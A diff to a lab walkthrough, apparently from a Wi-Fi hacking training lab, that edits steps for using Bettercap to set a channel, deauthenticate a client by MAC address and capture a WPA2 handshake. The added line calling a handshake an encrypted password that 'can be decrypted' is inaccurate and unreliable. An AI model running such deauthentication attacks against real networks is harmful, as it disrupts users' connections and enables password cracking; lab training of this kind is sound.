rufflabs/Wififorge.github.io/content/Lab Walkthroughs/Lab 01 - Bettercap Recon.md

 wifi.recon on
 ```

-Next, force the interface to only operate on channel 1
+Next, force the interface to only operate on channel 6

 ```bash
 wifi.recon.channel 6
 ```

-Start the deauthentication attack using the command below:
+Start the de-authentication attack using the command below:

 ```
 wifi.deauth 76:df:71:67:40:2b
 ```

 It may take a few seconds, but Bettercap will catch the handshake as shown below.
+A handshake is essentially an encrypted WPA2 password intercepted from between the client and router than can be decrypted offline.

 ![[Pasted image 20250318000519.png]]